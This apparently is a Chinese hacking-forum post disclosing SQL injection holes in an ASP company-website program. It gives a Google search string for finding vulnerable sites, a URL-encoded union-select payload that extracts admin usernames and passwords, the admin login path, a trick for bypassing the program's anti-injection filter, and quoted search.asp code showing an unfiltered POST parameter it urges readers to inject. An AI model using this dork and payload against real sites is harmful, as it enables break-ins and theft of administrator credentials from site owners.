- 帖子
- 154
- 积分
- 616
- 威望
- 754
- 金钱
- 898
- 在线时间
- 81 小时
|
漏洞报告:
http://www.jshell.cn/logview.asp?id=81
Google关键字:inurl:/Web-GuestView.asp
测试方法:
http://127.0.0.1/Company.asp?%69 ... 69on%20s%65lect%201,username,password,4,5,6,7,8%20fr%6Fm%20admin
后台登录: Admin_Cy/Zzm.asp
这程序的外观真不是一般的好啊 结果安全令人大跌眼镜
company.asp中 get方式获取的变量id的值仅仅过滤空格 和判断
值是否为空 包含了一防注 仅仅过滤了get方式传递进来的参数值
company.asp中却是 request.querystring("id") 也就是说 不能使用 post
以及cookie注入 但是防注却用的枫叶防注 嘿嘿 地球人都知道 把变量id的i编码
%69 直接绕过 另外 search.asp中
<%
if trim(request.QueryString("Search"))="" then
if trim(request.Form("Area"))="" then
Search="None"
else
Search=trim(request.Form("Area"))
end if
else
Search=trim(request.QueryString("Search"))
end if
KeyWord=trim(request.Form("KeyWord"))
select case Search
case "None"
response.write "<script language=javascript> alert('您没有选择检索范围,点击返回!');history.back(-1);</script>"
response.end
case "Pro"
Locality="检索产品 >> 关键字:"&KeyWord
SQL = "SELECT id,LName,LAddtime FROM Products where LName like '%"&KeyWord&"%' or LKeyWord like '%"&KeyWord&"%' and LPutout=true ORDER BY id DESC"
case "News"
Locality="检索新闻 >> 关键字:"&KeyWord
SQL= "SELECT id,NewTitle,AddTime FROM News where NewTitle like '%"&KeyWord&"%' and Putout=true ORDER BY id DESC"
case "zx"
Locality="检索资讯 >> 关键字:"&KeyWord
SQL= "SELECT id,FileName,AddTime FROM zx where FileName like '%"&KeyWord&"%' and Putout=true ORDER BY id DESC"
case "tc"
Locality="检索套餐 >> 关键字:"&KeyWord
SQL= "SELECT id,Title,AddTime FROM tc where Title like '%"&KeyWord&"%' and Putout=true ORDER BY id DESC"
case "Feedback"
Locality="检索留言 >> 关键字:"&KeyWord
SQL= "SELECT * FROM Feedback where Title like '%"&KeyWord&"%' and Outpub=true ORDER BY id DESC"
case "down"
Locality="检索下载 >> 关键字:"&KeyWord
SQL= "SELECT id,FileName,AddTime FROM down where FileName like '%"&KeyWord&"%' and Putout=true ORDER BY id DESC"
end select
'===========================
%>
看这里 KeyWord=trim(request.Form("KeyWord")) 是post了吧
注入吧 没任何限制
(以上内容为jshell原创,转载不注明出处的全家死光光) |
|